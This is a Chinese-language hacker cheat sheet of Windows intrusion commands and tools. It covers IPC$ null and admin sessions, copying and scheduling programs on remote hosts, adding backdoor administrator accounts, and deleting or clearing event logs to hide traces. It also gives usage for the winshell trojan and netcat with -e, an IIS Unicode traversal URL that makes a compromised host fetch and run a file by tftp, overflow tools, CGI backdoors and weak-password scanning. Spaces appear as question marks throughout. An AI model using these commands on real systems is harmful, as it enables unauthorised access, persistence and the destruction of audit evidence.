網管和黑客都必須知道的命令 | |
(與遠程主機建立空管連接)?net?use?\\IP地址\ipc$?""?/use:""? (以管理員身份登錄遠程主機)?net?use?\\IP地址\ipc$?"密碼"?/use:"Administrator"? (傳送文件到遠程主機WINNT目錄下)copy?本機目錄路徑\程序?\\IP地址\admin$? (查看遠程主機時間)?net?time?\\IP地址? (定時啟動某個程序)?at?\\IP地址?02:18?readme.exe? (查看共享)?net?view?\\IP地址? (查看netbios工作組列表)?nbtstat?-A?IP地址? (將遠程主機C盤映射為自己的F盤)?net?use?f:?\\IP地址\c$?""/user:"Administrator"? (這兩條把自己增加到管理員組):?net?user?用戶名?密碼?/add? net?localgroup?Administrators?用戶名?/add? (斷開連接)?net?use?\\IP地址\ipc$?/delete? 掃尾:? del?C:\winnt\system32\logfiles\*.*? del?C:\winnt\ssytem32\config\*.evt? del?C:\winnt\system32\dtclog\*.*? del?C:\winnt\system32\*.log? del?C:\winnt\system32\*.txt? del?C:\winnt\*.txt? del?C:\winnt\*.log? 一、netsvc.exe? 下面的命令分別是列出主機上的服務項目、查尋和遠程啟動主機的“時間任務”服務:? netsvc?/list?\\IP地址? netsvc?schedule?\\IP地址?/query? netsvc?\\IP地址?schedule?/start? 二、OpenTelnet.exe? 遠程啟動主機的Telnet服務,并綁定端口到7878,例如:? OpenTelnet?\\IP地址?用戶名?密碼?1?7878? 然后就可以telnet到主機的7878端口,進入DOS方式下:? telnet?IP地址?7878? 三、winshell.exe? 一個非常小的木馬(不到6K),telnet到主機的7878端口,輸入密碼winshell,當看到CMD>后,可打下面的命令:? p?Path?(查看winshell主程序的路徑信息)? b?reBoot?(重新啟動機器)? d?shutDown?(關閉機器)? s?Shell?(執行后你就會看到可愛的“C:\>”)? x?eXit?(退出本次登錄會話,此命令并不終止winshell的運行)? CMD>?http://.../srv.exe?(通過http下載其他網站上的文件到運行winshell的機器上)? 四、3389登陸器,GUI方式登錄遠程主機的? 五、elsave.exe? 事件日志清除工具? elsave?-s?\\IP地址?-l?"application"?-C? elsave?-s?\\IP地址?-l?"system"?-C? elsave?-s?\\IP地址?-l?"security"?-C? 執行后成功清除應用程序日志,系統日志,安全日志? 六、hbulot.exe? 開啟win2kserver和winxp的3389服務? hbulot?[/r]? 使用/r表示安裝完成后自動重起目標使設置生效。? 七、nc.exe(netcat.exe)? 一個很好的工具,一些腳本程序都要用到它,也可做溢出后的連接用。? 想要連接到某處:?nc?[-options]?hostname?port[s]?[ports]?...? 綁定端口等待連接:?nc?-l?-p?port?[-options]?[hostname]?[port]? 參數:? -e?prog?程序重定向,一旦連接,就執行?[危險!!]? -g?gateway?source-routing?hop?point[s],?up?to?8? -G?num?source-routing?pointer:?4,?8,?12,?...? -h?幫助信息? -i?secs?延時的間隔? -l?監聽模式,用于入站連接? -n?指定數字的IP地址,不能用hostname? -o?file?記錄16進制的傳輸? -p?port?本地端口號? -r?任意指定本地及遠程端口? -s?addr?本地源地址? -u?UDP模式? -v?詳細輸出——用兩個-v可得到更詳細的內容? -w?secs?timeout的時間? -z?將輸入輸出關掉——用于掃描時? 八、TFTPD32.EXE? 把自己的電腦臨時變為一臺FTP服務器,讓肉雞來下載文件,tftp命令要在肉雞上執行,通常要利用Unicode漏洞或telnet到肉雞,例如:? http://IP地址/s?cripts/..%255c..%255c/winnt/system32/cmd.exe?/c?tftp?-i?本機IP地址?get?文件名?c:\winnt\system32\文件名? 然后可以直接令文件運行:? http://IP地址/s?cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名? 九、prihack.exe是IIS的printer遠程緩沖區溢出工具。idqover.exe是溢出idq的,選擇“溢出后在一個端口監聽”,然后用telnet連接它的監聽端口,如果溢出成功,一連它的端口,綁定的命令馬上執行。xploit.exe是一個圖形界面的ida溢出,成功以后winxp下需要打winxp。? 一○、ntis.exe、cmd.exe和cmdasp.asp是三個cgi-backdoor,exe要放到cgi-bin目錄下,asp放到有ASP執行權限的目錄。然后用IE瀏覽器連接。? 一、一?Xscan命令行運行參數說明:? 在檢測過程中,按"[空格]"鍵可以查看各線程狀態及掃描進度,按"q"鍵保存當前數據后提前退出程序,按"<ctrl+c>"強行關閉程序。? 1.命令格式:?xscan?-host?<起始IP>[-<終止IP>]?<檢測項目>?[其他選項]? xscan?-file?<主機列表文件名>?<檢測項目>?[其他選項]? 其中<檢測項目>?含義如下:? -port?:?檢測常用服務的端口狀態(可通過\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"項定制待檢測端口列表);? -ftp?:?檢測FTP弱口令(可通過\dat\config.ini文件設置用戶名/密碼字典文件);? -ntpass?:?檢測NT-Server弱口令(可通過\dat\config.ini文件設置用戶名/密碼字典文件);? -cgi?:?檢測CGI漏洞(可通過\dat\config.ini文件的"CGI-ENCODE\encode_type"項設置編碼方案);? -iis?:?檢測IIS漏洞(可通過\dat\config.ini文件的"CGI-ENCODE\encode_type"項設置編碼方案);? [其他選項]?含義如下:? -v:?顯示詳細掃描進度? -p:?跳過Ping不通的主機? -o:?跳過沒有檢測到開放端口的主機? -t?<并發線程數量[,并發主機數量]>:?指定最大并發線程數量和并發主機數量,?默認數量為100,10? |